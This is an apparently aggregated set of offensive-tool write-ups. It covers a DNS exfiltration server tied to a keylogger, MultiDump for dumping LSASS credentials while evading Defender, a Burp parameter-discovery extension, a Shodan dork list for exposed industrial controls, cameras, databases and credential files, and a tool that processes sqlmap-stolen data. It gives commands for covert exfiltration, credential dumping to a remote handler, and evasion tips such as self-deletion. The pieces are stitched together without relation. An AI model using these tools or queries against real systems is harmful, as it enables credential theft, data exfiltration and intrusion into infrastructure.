You can also choose to build the program with debugging by making the debug target.

make debug domain=example.com

For both targets, you will need to specify the domain the server is listening for.

Sending Test Requests

You can use dig to send requests to the server:

dig @127.0.0.1 a.1.1.1.example.com A +short sends a connection request to a server on localhost.

dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short sends a test message to localhost.

Replace example.com with the domain the server is listening for.
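
For reference, the long hex blob in the second request is simply hex-encoded ASCII, as a quick Python check shows (the trailing 1B byte is an ESC control character):

>>> bytes.fromhex("54686520717569636B2062726F776E20666F782E1B")
b'The quick brown fox.\x1b'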

Protocol

Starting a Connection

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in the following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

Exfiltrating Data

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.
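
To make the formats concrete, here is a minimal Python sketch (the helper names are hypothetical, not part of the actual client) that builds both query names described above:

# Build the connection-request and data-exfiltration query names.
def connect_query(sld="example", tld="com"):
    return f"a.1.1.1.{sld}.{tld}"

def data_query(packet_num, client_id, data, sld="example", tld="com"):
    hex_data = data.encode("ascii").hex()  # data is sent as hex-encoded ASCII
    return f"b.{packet_num}.{client_id}.{hex_data}.{sld}.{tld}"

print(connect_query())         # a.1.1.1.example.com
print(data_query(0, 7, "hi"))  # b.0.7.6869.example.com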

Response Codes

200: OK

If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests

If the client sends a malformed record request, the server will respond with code 201.

202: Non-Existent Connections

If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets

If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204: Max Connections Reached

If the client attempts to create a connection when the maximum has been reached, the server will respond with code 204.

Dropped Packets

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.

Side Notes

Linux

Log File

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.

Non-Interactive Shells

The keylogger relies on script, so the keylogger won't run in non-interactive shells.

Windows

Repeated Requests

For some reason, the Windows Dns_Query_A always sends duplicate requests. The server will process it fine because it discards repeated packets.



MultiDump - Post-Exploitation Tool For Dumping And Extracting LSASS Memory Discreetly


MultiDump is a post-exploitation tool written in C for dumping and extracting LSASS memory discreetly, without triggering Defender alerts, with a handler written in Python.

Blog post: https://xre0us.io/posts/multidump


MultiDump supports LSASS dumping via ProcDump.exe or comsvcs.dll. It offers two modes: a local mode that encrypts and stores the dump file locally, and a remote mode that sends the dump to a handler for decryption and analysis.

Usage

[ MultiDump ASCII art banner ]

Usage: MultiDump.exe [-p <ProcDumpPath>] [-l <LocalDumpPath> | -r <RemoteHandlerAddr>] [--procdump] [-v]

-p Path to save procdump.exe, use full path. Default to temp directory
-l Path to save encrypted dump file, use full path. Default to current directory
-r Set ip:port to connect to a remote handler
--procdump Writes procdump to disk and use it to dump LSASS
--nodump Disable LSASS dumping
--reg Dump SAM, SECURITY and SYSTEM hives
--delay Increase the interval between connections, for slower network speeds
-v Enable verbose mode

MultiDump defaults in local mode using comsvcs.dll and saves the encrypted dump in the current directory.
Examples:
MultiDump.exe -l C:\Users\Public\lsass.dmp -v
MultiDump.exe --procdump -p C:\Tools\procdump.exe -r 192.168.1.100:5000
usage: MultiDumpHandler.py [-h] [-r REMOTE] [-l LOCAL] [--sam SAM] [--security SECURITY] [--system SYSTEM] [-k KEY] [--override-ip OVERRIDE_IP]

Handler for RemoteProcDump

options:
-h, --help show this help message and exit
-r REMOTE, --remote REMOTE
Port to receive remote dump file
-l LOCAL, --local LOCAL
Local dump file, key needed to decrypt
--sam SAM Local SAM save, key needed to decrypt
--security SECURITY Local SECURITY save, key needed to decrypt
--system SYSTEM Local SYSTEM save, key needed to decrypt
-k KEY, --key KEY Key to decrypt local file
--override-ip OVERRIDE_IP
Manually specify the IP address for key generation in remote mode, for proxied connection

As with all LSASS-related tools, Administrator/SeDebugPrivilege privileges are required.

The handler depends on Pypykatz to parse the LSASS dump, and on impacket to parse the registry saves. They should be installed in your environment. If you see the error All detection methods failed, it's likely that the Pypykatz version is outdated.

By default, MultiDump uses the comsvcs.dll method and saves the encrypted dump in the current directory.

MultiDump.exe
...
[i] Local Mode Selected. Writing Encrypted Dump File to Disk...
[i] C:\Users\MalTest\Desktop\dciqjp.dat Written to Disk.
[i] Key: 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e
./ProcDumpHandler.py -f dciqjp.dat -k 91ea54633cd31cc23eb3089928e9cd5af396d35ee8f738d8bdf2180801ee0cb1bae8f0cc4cc3ea7e9ce0a74876efe87e2c053efa80ee1111c4c4e7c640c0e33e

If --procdump is used, ProcDump.exe will be written to disk to dump LSASS.

In remote mode, MultiDump connects to the handler's listener.

./ProcDumpHandler.py -r 9001
[i] Listening on port 9001 for encrypted key...
MultiDump.exe -r 10.0.0.1:9001

The key is encrypted with the handler's IP and port. When MultiDump connects through a proxy, the handler should use the --override-ip option to manually specify the IP address for key generation in remote mode, ensuring decryption works correctly by matching the decryption IP with the expected IP set in MultiDump -r.
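
For example, if MultiDump is started with -r 10.0.0.1:9001 but reaches the handler through a redirector (hypothetical addresses), the handler must derive the key from the address the implant targeted:

./MultiDumpHandler.py -r 9001 --override-ip 10.0.0.1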

An additional option to dump the SAM, SECURITY and SYSTEM hives is available with --reg; the decryption process is the same as for LSASS dumps. This is more of a convenience feature to make post-exploitation information gathering easier.

Building MultiDump

Open in Visual Studio, build in Release mode.

Customising MultiDump

It is recommended to customise the binary before compiling, such as by changing the static strings or the RC4 key used to encrypt them. To do so, another Visual Studio project, EncryptionHelper, is included. Simply change the key or strings, and the output of the compiled EncryptionHelper.exe can be pasted into MultiDump.c and Common.h.

Self deletion can be toggled by uncommenting the following line in Common.h:

#define SELF_DELETION

To further evade string analysis, most of the output messages can be excluded from compiling by commenting the following line in Debug.h:

//#define DEBUG

MultiDump might get detected on Windows 10 22H2 (19045) (sort of), and I have implemented a fix for it (sort of); the investigation and implementation deserve a blog post of their own: https://xre0us.io/posts/saving-lsass-from-defender/




GAP-Burp-Extension - Burp Extension To Find Potential Endpoints, Parameters, And Generate A Custom Target Wordlist


This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target-specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.


TL;DR

Installation

  1. Visit the Jython Official Site and download the latest standalone JAR file, e.g. jython-standalone-2.7.3.jar.
  2. Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
  3. On a command line, go to the directory where the jar file is and run java -jar jython-standalone-2.7.3.jar -m ensurepip.
  4. Download GAP.py and requirements.txt from this project and place them in the same directory.
  5. Install Jython modules by running java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.
  6. Go to Extensions -> Installed and click Add under Burp Extensions.
  7. Select Extension type of Python and select the GAP.py file.

Using

  1. Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose the GAP extension:

Or you can right click a request or response in any other context and select GAP from the Extensions menu.

  2. Then go to the GAP tab to see the results:

IMPORTANT Notes

If you don't need one of the modes, un-check it, as results will be returned more quickly.

If you run GAP for one or more targets from the Site Map view, don't have them expanded when you run GAP... unfortunately this can make it a lot slower. It will be more efficient if you run it for one or two targets in the Site Map view at a time, as huge projects can consume a lot of resources.

If you want to run GAP on one or more specific requests, do not select them from the Site Map tree view. It will be a lot quicker to run it from the Site Map Contents view if possible, or from Proxy history.

It is hard to design GAP to display all controls for all screen resolutions and font sizes. I have tried to deal with the most common setups, but if you find you cannot see all the controls, you can hold down the Ctrl key and click the GAP logo header image to remove it and make more space.

The Words mode uses the beautifulsoup4 library and this can be quite slow, so be patient!

In Depth Instructions

Below is an in-depth look at the GAP Burp extension, from installing it successfully, to explaining all of the features.

NOTE: This video is from 16th July 2023 and explores v3.X, so any features added after that date may not be covered.

TODO

  • Get potential parameters from the Request that Burp doesn't identify itself, e.g. XML, graphql, etc.
  • Add an option to not add the Tentative Issues, e.g. parameters that were found in the Response (but not as query parameters in links found).
  • Improve performance of the link finding regular expressions.
  • Include the Request/Response markers in the raised Sus parameter Issues if I can find a way to not make performance really bad!
  • Deal with other size displays and font sizes better to make sure all controls are viewable.
  • If multiple Site Map tree targets are selected, write the files more efficiently. This can take forever in some cases.
  • Use an alternative to beautifulsoup4 that is faster to parse responses for Words.

Good luck and good hunting! If you really love the tool (or any others), or they helped you find an awesome bounty, consider BUYING ME A COFFEE! ☕ (I could use the caffeine!)

🤘 /XNL-h4ck3r



Shodan Dorks


Shodan Dorks by twitter.com/lothos612

Feel free to make suggestions


Shodan Dorks

Basic Shodan Filters

city:

Find devices in a particular city. city:"Bangalore"

country:

Find devices in a particular country. country:"IN"

geo:

Find devices by giving geographical coordinates. geo:"56.913055,118.250862"

Location

country:us country:ru country:de city:chicago

hostname:

Find devices matching the hostname. server: "gws" hostname:"google" hostname:example.com -hostname:subdomain.example.com hostname:example.com,example.org

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

org:microsoft org:"United States Department"

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices seen before or after a given date. apache after:22/02/2009 before:14/3/2010
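
All of the filters in this list can also be run programmatically through Shodan's official Python library (pip install shodan); a minimal sketch, assuming a valid API key:

# Minimal sketch: running a dork via the official shodan library.
# Replace YOUR_API_KEY with a real key; most filters require a paid
# API plan, and each query page consumes query credits.
import shodan

api = shodan.Shodan("YOUR_API_KEY")
results = api.search('os:"windows 7" country:"IN"')
print(f"Total results: {results['total']}")
for match in results["matches"][:5]:
    print(match["ip_str"], match.get("port"), match.get("org"))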

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge

Operating System

os:"windows 7" os:"windows server 2012" os:"linux 3.x"

Product

product:apache product:nginx product:android product:chromecast

Customer Premises Equipment (CPE)

cpe:apple cpe:microsoft cpe:nginx cpe:cisco

Server

server: nginx server: apache server: microsoft server: cisco-ios

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Web

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Tor / Dark Web sites

onion-location

Databases

MySQL

"product:MySQL" mysql port:"3306"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication

Kibana dashboards without authentication

kibana content-length:217

elastic

port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal. "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM access. NCR port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

S7

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

C2 Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik

Brute Ratel

http.html_hash:-1957161625 product:"Brute Ratel C4"

Covenant

ssl:"Covenant" http.component:"Blazor"

Metasploit

ssl:"MetasploitSelfSignedCA"

Network Infrastructure

Hacked routers:

Routers which got compromised. hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway. title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

DNS Servers with recursion

"port: 53" Recursion: Enabled

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access. port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy, fractured update approach. 🙄

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23


Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter's admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"


Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Ethereum Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

http.html:"* The wp-config.php creation script uses this file"

Too Many Minecraft Servers

"Minecraft Server" "protocol 340" port:25565

Literally Everything in North Korea

net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24



mapXplore - Allow Exporting The Information Downloaded With Sqlmap To A Relational Database Like Postgres And Sqlite


mapXplore is a modular application that imports data extracted by sqlmap into a PostgreSQL or SQLite database.

Its main features are:

  • Import of information extracted from sqlmap to PostgreSQL or SQLite for subsequent querying.
  • Sanitizes information: at import time, it decodes or transforms unreadable data into a readable form.
  • Search for information in all tables, such as passwords, users, and desired information.
  • Automatic export of information stored in base64 (see the sketch after this list), such as:

    • Word, Excel, PowerPoint files
    • .zip files
    • Text files or plain text information
    • Images
  • Filter tables and columns by criteria.

  • Filter by different types of hash functions without requiring prior conversion.
  • Export relevant information to Excel or HTML
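
The base64 auto-export can be illustrated with a short, hypothetical sketch (not mapXplore's actual code): detect base64 payloads, decode them, and infer the file type from magic bytes:

# Hypothetical sketch of auto-exporting base64-encoded values;
# not mapXplore's actual implementation.
import base64
import binascii

MAGIC = {
    b"PK\x03\x04": "zip/office",  # .zip and modern Word/Excel/PowerPoint
    b"\x89PNG": "png",
    b"\xff\xd8\xff": "jpeg",
}

def try_decode(value: str) -> tuple[str, bytes] | None:
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None
    for magic, kind in MAGIC.items():
        if raw.startswith(magic):
            return kind, raw
    return "text", raw  # decodable, but no known magic bytes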

Installation

Requirements

  • python-3.11
git clone https://github.com/daniel2005d/mapXplore
cd mapXplore
pip install -r requirements

Usage

It is a modular application, consisting of the following:

  • config: Responsible for configuration, such as the database engine to use, import paths, and other settings.
  • import: Responsible for importing and processing the information extracted from sqlmap.
  • query: The main module, capable of filtering and extracting the required information.
    • Filter by tables
    • Filter by columns
    • Filter by one or more words
    • Filter by one or more hash functions (see the sketch after this list), within which are:
      • MD5
      • SHA1
      • SHA256
      • SHA3
      • ....
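
mapXplore's internals aren't shown here, but filtering by hash function without prior conversion can be illustrated by matching candidate values against the characteristic pattern of each digest; a hypothetical sketch:

# Hypothetical sketch of detecting hash types by pattern, illustrating
# "filter by hash function without prior conversion". Not mapXplore's
# actual implementation.
import re

HASH_PATTERNS = {
    "MD5":    re.compile(r"^[0-9a-fA-F]{32}$"),
    "SHA1":   re.compile(r"^[0-9a-fA-F]{40}$"),
    "SHA256": re.compile(r"^[0-9a-fA-F]{64}$"),
}

def detect_hash(value: str) -> str | None:
    for name, pattern in HASH_PATTERNS.items():
        if pattern.match(value):
            return name
    return None

print(detect_hash("5f4dcc3b5aa765d61d8327deb882cf99"))  # -> MD5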

Getting Started

A default configuration can be loaded at the start of the program:

python engine.py [--config config.json]



